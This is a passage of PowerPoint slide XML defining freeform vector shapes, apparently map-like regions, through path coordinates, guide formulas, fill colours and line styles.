                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="101"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36143" name="Freeform 276"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2588" y="2207"/>
                <a:ext cx="54" cy="105"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 54"/>
                  <a:gd name="T1" fmla="*/ 102 h 105"/>
                  <a:gd name="T2" fmla="*/ 24 w 54"/>
                  <a:gd name="T3" fmla="*/ 105 h 105"/>
                  <a:gd name="T4" fmla="*/ 16 w 54"/>
                  <a:gd name="T5" fmla="*/ 103 h 105"/>
                  <a:gd name="T6" fmla="*/ 9 w 54"/>
                  <a:gd name="T7" fmla="*/ 105 h 105"/>
                  <a:gd name="T8" fmla="*/ 11 w 54"/>
                  <a:gd name="T9" fmla="*/ 95 h 105"/>
                  <a:gd name="T10" fmla="*/ 9 w 54"/>
                  <a:gd name="T11" fmla="*/ 86 h 105"/>
                  <a:gd name="T12" fmla="*/ 11 w 54"/>
                  <a:gd name="T13" fmla="*/ 77 h 105"/>
                  <a:gd name="T14" fmla="*/ 11 w 54"/>
                  <a:gd name="T15" fmla="*/ 75 h 105"/>
                  <a:gd name="T16" fmla="*/ 5 w 54"/>
                  <a:gd name="T17" fmla="*/ 77 h 105"/>
                  <a:gd name="T18" fmla="*/ 7 w 54"/>
                  <a:gd name="T19" fmla="*/ 72 h 105"/>
                  <a:gd name="T20" fmla="*/ 9 w 54"/>
                  <a:gd name="T21" fmla="*/ 69 h 105"/>
                  <a:gd name="T22" fmla="*/ 6 w 54"/>
                  <a:gd name="T23" fmla="*/ 70 h 105"/>
                  <a:gd name="T24" fmla="*/ 0 w 54"/>
                  <a:gd name="T25" fmla="*/ 71 h 105"/>
                  <a:gd name="T26" fmla="*/ 1 w 54"/>
                  <a:gd name="T27" fmla="*/ 66 h 105"/>
                  <a:gd name="T28" fmla="*/ 2 w 54"/>
                  <a:gd name="T29" fmla="*/ 57 h 105"/>
                  <a:gd name="T30" fmla="*/ 6 w 54"/>
                  <a:gd name="T31" fmla="*/ 52 h 105"/>
                  <a:gd name="T32" fmla="*/ 9 w 54"/>
                  <a:gd name="T33" fmla="*/ 40 h 105"/>
                  <a:gd name="T34" fmla="*/ 11 w 54"/>
                  <a:gd name="T35" fmla="*/ 15 h 105"/>
                  <a:gd name="T36" fmla="*/ 10 w 54"/>
                  <a:gd name="T37" fmla="*/ 7 h 105"/>
                  <a:gd name="T38" fmla="*/ 18 w 54"/>
                  <a:gd name="T39" fmla="*/ 2 h 105"/>
                  <a:gd name="T40" fmla="*/ 25 w 54"/>
                  <a:gd name="T41" fmla="*/ 5 h 105"/>
                  <a:gd name="T42" fmla="*/ 42 w 54"/>
                  <a:gd name="T43" fmla="*/ 3 h 105"/>
                  <a:gd name="T44" fmla="*/ 47 w 54"/>
                  <a:gd name="T45" fmla="*/ 5 h 105"/>
                  <a:gd name="T46" fmla="*/ 54 w 54"/>
                  <a:gd name="T47" fmla="*/ 12 h 105"/>
                  <a:gd name="T48" fmla="*/ 52 w 54"/>
                  <a:gd name="T49" fmla="*/ 17 h 105"/>
                  <a:gd name="T50" fmla="*/ 43 w 54"/>
                  <a:gd name="T51" fmla="*/ 22 h 105"/>
                  <a:gd name="T52" fmla="*/ 43 w 54"/>
                  <a:gd name="T53" fmla="*/ 31 h 105"/>
                  <a:gd name="T54" fmla="*/ 42 w 54"/>
                  <a:gd name="T55" fmla="*/ 49 h 105"/>
                  <a:gd name="T56" fmla="*/ 39 w 54"/>
                  <a:gd name="T57" fmla="*/ 53 h 105"/>
                  <a:gd name="T58" fmla="*/ 33 w 54"/>
                  <a:gd name="T59" fmla="*/ 54 h 105"/>
                  <a:gd name="T60" fmla="*/ 40 w 54"/>
                  <a:gd name="T61" fmla="*/ 64 h 105"/>
                  <a:gd name="T62" fmla="*/ 39 w 54"/>
                  <a:gd name="T63" fmla="*/ 69 h 105"/>
                  <a:gd name="T64" fmla="*/ 34 w 54"/>
                  <a:gd name="T65" fmla="*/ 79 h 105"/>
                  <a:gd name="T66" fmla="*/ 42 w 54"/>
                  <a:gd name="T67" fmla="*/ 83 h 105"/>
                  <a:gd name="T68" fmla="*/ 34 w 54"/>
                  <a:gd name="T69" fmla="*/ 92 h 105"/>
                  <a:gd name="T70" fmla="*/ 32 w 54"/>
                  <a:gd name="T71" fmla="*/ 101 h 105"/>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54"/>
                  <a:gd name="T109" fmla="*/ 0 h 105"/>
                  <a:gd name="T110" fmla="*/ 54 w 54"/>
                  <a:gd name="T111" fmla="*/ 105 h 105"/>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54" h="105">
                    <a:moveTo>
                      <a:pt x="32" y="101"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="30" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="101"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36144" name="Freeform 277"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1447" y="2946"/>
                <a:ext cx="203" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 202 w 203"/>
                  <a:gd name="T1" fmla="*/ 197 h 295"/>
                  <a:gd name="T2" fmla="*/ 199 w 203"/>
                  <a:gd name="T3" fmla="*/ 208 h 295"/>
                  <a:gd name="T4" fmla="*/ 200 w 203"/>
                  <a:gd name="T5" fmla="*/ 224 h 295"/>
                  <a:gd name="T6" fmla="*/ 193 w 203"/>
                  <a:gd name="T7" fmla="*/ 234 h 295"/>
                  <a:gd name="T8" fmla="*/ 194 w 203"/>
                  <a:gd name="T9" fmla="*/ 246 h 295"/>
                  <a:gd name="T10" fmla="*/ 197 w 203"/>
                  <a:gd name="T11" fmla="*/ 261 h 295"/>
                  <a:gd name="T12" fmla="*/ 190 w 203"/>
                  <a:gd name="T13" fmla="*/ 272 h 295"/>
                  <a:gd name="T14" fmla="*/ 190 w 203"/>
                  <a:gd name="T15" fmla="*/ 280 h 295"/>
                  <a:gd name="T16" fmla="*/ 185 w 203"/>
                  <a:gd name="T17" fmla="*/ 284 h 295"/>
                  <a:gd name="T18" fmla="*/ 176 w 203"/>
                  <a:gd name="T19" fmla="*/ 295 h 295"/>
                  <a:gd name="T20" fmla="*/ 162 w 203"/>
                  <a:gd name="T21" fmla="*/ 284 h 295"/>
                  <a:gd name="T22" fmla="*/ 156 w 203"/>
                  <a:gd name="T23" fmla="*/ 274 h 295"/>
                  <a:gd name="T24" fmla="*/ 145 w 203"/>
                  <a:gd name="T25" fmla="*/ 269 h 295"/>
                  <a:gd name="T26" fmla="*/ 129 w 203"/>
                  <a:gd name="T27" fmla="*/ 260 h 295"/>
                  <a:gd name="T28" fmla="*/ 108 w 203"/>
                  <a:gd name="T29" fmla="*/ 249 h 295"/>
                  <a:gd name="T30" fmla="*/ 85 w 203"/>
                  <a:gd name="T31" fmla="*/ 228 h 295"/>
                  <a:gd name="T32" fmla="*/ 82 w 203"/>
                  <a:gd name="T33" fmla="*/ 213 h 295"/>
                  <a:gd name="T34" fmla="*/ 65 w 203"/>
                  <a:gd name="T35" fmla="*/ 181 h 295"/>
                  <a:gd name="T36" fmla="*/ 59 w 203"/>
                  <a:gd name="T37" fmla="*/ 177 h 295"/>
                  <a:gd name="T38" fmla="*/ 58 w 203"/>
                  <a:gd name="T39" fmla="*/ 167 h 295"/>
                  <a:gd name="T40" fmla="*/ 38 w 203"/>
                  <a:gd name="T41" fmla="*/ 128 h 295"/>
                  <a:gd name="T42" fmla="*/ 22 w 203"/>
                  <a:gd name="T43" fmla="*/ 105 h 295"/>
                  <a:gd name="T44" fmla="*/ 7 w 203"/>
                  <a:gd name="T45" fmla="*/ 96 h 295"/>
                  <a:gd name="T46" fmla="*/ 4 w 203"/>
                  <a:gd name="T47" fmla="*/ 91 h 295"/>
                  <a:gd name="T48" fmla="*/ 9 w 203"/>
                  <a:gd name="T49" fmla="*/ 86 h 295"/>
                  <a:gd name="T50" fmla="*/ 0 w 203"/>
                  <a:gd name="T51" fmla="*/ 72 h 295"/>
                  <a:gd name="T52" fmla="*/ 6 w 203"/>
                  <a:gd name="T53" fmla="*/ 62 h 295"/>
                  <a:gd name="T54" fmla="*/ 19 w 203"/>
                  <a:gd name="T55" fmla="*/ 53 h 295"/>
                  <a:gd name="T56" fmla="*/ 17 w 203"/>
                  <a:gd name="T57" fmla="*/ 63 h 295"/>
                  <a:gd name="T58" fmla="*/ 22 w 203"/>
                  <a:gd name="T59" fmla="*/ 68 h 295"/>
                  <a:gd name="T60" fmla="*/ 31 w 203"/>
                  <a:gd name="T61" fmla="*/ 74 h 295"/>
                  <a:gd name="T62" fmla="*/ 39 w 203"/>
                  <a:gd name="T63" fmla="*/ 77 h 295"/>
                  <a:gd name="T64" fmla="*/ 50 w 203"/>
                  <a:gd name="T65" fmla="*/ 53 h 295"/>
                  <a:gd name="T66" fmla="*/ 66 w 203"/>
                  <a:gd name="T67" fmla="*/ 42 h 295"/>
                  <a:gd name="T68" fmla="*/ 83 w 203"/>
                  <a:gd name="T69" fmla="*/ 34 h 295"/>
                  <a:gd name="T70" fmla="*/ 96 w 203"/>
                  <a:gd name="T71" fmla="*/ 15 h 295"/>
                  <a:gd name="T72" fmla="*/ 96 w 203"/>
                  <a:gd name="T73" fmla="*/ 5 h 295"/>
                  <a:gd name="T74" fmla="*/ 107 w 203"/>
                  <a:gd name="T75" fmla="*/ 4 h 295"/>
                  <a:gd name="T76" fmla="*/ 113 w 203"/>
                  <a:gd name="T77" fmla="*/ 13 h 295"/>
                  <a:gd name="T78" fmla="*/ 126 w 203"/>
                  <a:gd name="T79" fmla="*/ 26 h 295"/>
                  <a:gd name="T80" fmla="*/ 133 w 203"/>
                  <a:gd name="T81" fmla="*/ 29 h 295"/>
                  <a:gd name="T82" fmla="*/ 135 w 203"/>
                  <a:gd name="T83" fmla="*/ 36 h 295"/>
                  <a:gd name="T84" fmla="*/ 150 w 203"/>
                  <a:gd name="T85" fmla="*/ 37 h 295"/>
                  <a:gd name="T86" fmla="*/ 159 w 203"/>
                  <a:gd name="T87" fmla="*/ 36 h 295"/>
                  <a:gd name="T88" fmla="*/ 170 w 203"/>
                  <a:gd name="T89" fmla="*/ 36 h 295"/>
                  <a:gd name="T90" fmla="*/ 180 w 203"/>
                  <a:gd name="T91" fmla="*/ 44 h 295"/>
                  <a:gd name="T92" fmla="*/ 176 w 203"/>
                  <a:gd name="T93" fmla="*/ 57 h 295"/>
                  <a:gd name="T94" fmla="*/ 183 w 203"/>
                  <a:gd name="T95" fmla="*/ 64 h 295"/>
                  <a:gd name="T96" fmla="*/ 176 w 203"/>
                  <a:gd name="T97" fmla="*/ 66 h 295"/>
                  <a:gd name="T98" fmla="*/ 166 w 203"/>
                  <a:gd name="T99" fmla="*/ 69 h 295"/>
                  <a:gd name="T100" fmla="*/ 145 w 203"/>
                  <a:gd name="T101" fmla="*/ 75 h 295"/>
                  <a:gd name="T102" fmla="*/ 133 w 203"/>
                  <a:gd name="T103" fmla="*/ 89 h 295"/>
                  <a:gd name="T104" fmla="*/ 133 w 203"/>
                  <a:gd name="T105" fmla="*/ 100 h 295"/>
                  <a:gd name="T106" fmla="*/ 124 w 203"/>
                  <a:gd name="T107" fmla="*/ 107 h 295"/>
                  <a:gd name="T108" fmla="*/ 120 w 203"/>
                  <a:gd name="T109" fmla="*/ 118 h 295"/>
                  <a:gd name="T110" fmla="*/ 135 w 203"/>
                  <a:gd name="T111" fmla="*/ 141 h 295"/>
                  <a:gd name="T112" fmla="*/ 140 w 203"/>
                  <a:gd name="T113" fmla="*/ 148 h 295"/>
                  <a:gd name="T114" fmla="*/ 147 w 203"/>
                  <a:gd name="T115" fmla="*/ 152 h 295"/>
                  <a:gd name="T116" fmla="*/ 166 w 203"/>
                  <a:gd name="T117" fmla="*/ 153 h 295"/>
                  <a:gd name="T118" fmla="*/ 172 w 203"/>
                  <a:gd name="T119" fmla="*/ 160 h 295"/>
                  <a:gd name="T120" fmla="*/ 175 w 203"/>
                  <a:gd name="T121" fmla="*/ 173 h 295"/>
                  <a:gd name="T122" fmla="*/ 185 w 203"/>
                  <a:gd name="T123" fmla="*/ 172 h 295"/>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203"/>
                  <a:gd name="T187" fmla="*/ 0 h 295"/>
                  <a:gd name="T188" fmla="*/ 203 w 203"/>
                  <a:gd name="T189" fmla="*/ 295 h 295"/>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203" h="295">
                    <a:moveTo>
                      <a:pt x="188" y="171"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="196" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="45"/>
